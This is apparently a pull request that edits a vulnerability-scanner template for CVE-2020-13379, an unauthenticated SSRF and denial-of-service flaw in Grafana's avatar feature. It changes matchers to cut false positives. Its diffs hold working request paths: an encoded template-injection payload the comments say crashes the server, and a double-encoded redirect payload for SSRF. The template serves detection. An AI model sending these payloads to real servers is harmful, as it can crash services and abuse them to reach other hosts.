### PR TITLE
Update CVE-2020-13379.yaml

### DIFF
--- a/cves/CVE-2020-13379.yaml
+++ b/cves/CVE-2020-13379.yaml
@@ -5,7 +5,7 @@ info:
   author: pxmme1337
   severity: medium
   description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client.
-  
+
   # Source:-  https://www.exploit-db.com/exploits/48638
   # WARNING
   # This vulnerability results in complete crashing of the grafana-server application.
@@ -15,10 +15,7 @@ requests:
     path:
       - '{{BaseURL}}/avatar/test%3fd%3dredirect.example.com%25253f%253b%252fbp.blogspot.com%252f
     matchers:
-      - type: status
-        status:
-          - 200
       - type: word
-	      words:
-	        - "image/jpeg"
-	      part: header
+        words:
+          - "image/jpeg"
+        part: header

--- a/cves/CVE-2020-13379.yaml
+++ b/cves/CVE-2020-13379.yaml
@@ -1,15 +1,12 @@
 id: CVE-2020-13379
-
+# https://grafana.com/blog/2020/06/03/grafana-6.7.4-and-7.0.2-released-with-important-security-fix/
+# https://rhynorater.github.io/CVE-2020-13379-Write-Up
 info:
   name: Unauthenticated Grafana DoS
-  author: pxmme1337
+  author: joeldeleep
   severity: medium
-  description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client.
-
-  # Source:-  https://www.exploit-db.com/exploits/48638
-  # WARNING
-  # This vulnerability results in complete crashing of the grafana-server application.
-
+  description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client. 
+  
 requests:
   - method: GET
     path:

--- a/cves/CVE-2020-13379.yaml
+++ b/cves/CVE-2020-13379.yaml
@@ -13,10 +13,12 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
-      - '{{BaseURL}}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
-      - "{{BaseURL}}/"
+      - '{{BaseURL}}/avatar/test%3fd%3dredirect.example.com%25253f%253b%252fbp.blogspot.com%252f
     matchers:
       - type: status
         status:
-          - 502
+          - 200
+      - type: word
+	      words:
+	        - "image/jpeg"
+	      part: header

--- a/cves/CVE-2020-13379.yaml
+++ b/cves/CVE-2020-13379.yaml
@@ -5,7 +5,7 @@ info:
   author: pxmme1337
   severity: medium
   description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client.
-
+  
   # Source:-  https://www.exploit-db.com/exploits/48638
   # WARNING
   # This vulnerability results in complete crashing of the grafana-server application.


### PR DESCRIPTION
The old matching using status code 502 returned false positive when the endpoint is already having a bad gateway. Going through the report at [hackerone](https://hackerone.com/reports/878779) and [presentation](https://www.youtube.com/watch?v=NWHOmYbLrZ0) , the path has been rewritten and matched with respective image/jpeg as explained in the poc. I request to verify the template with the help from [Justin Gardner](http://github.com/rhynorater/) , the researcher who found the issue,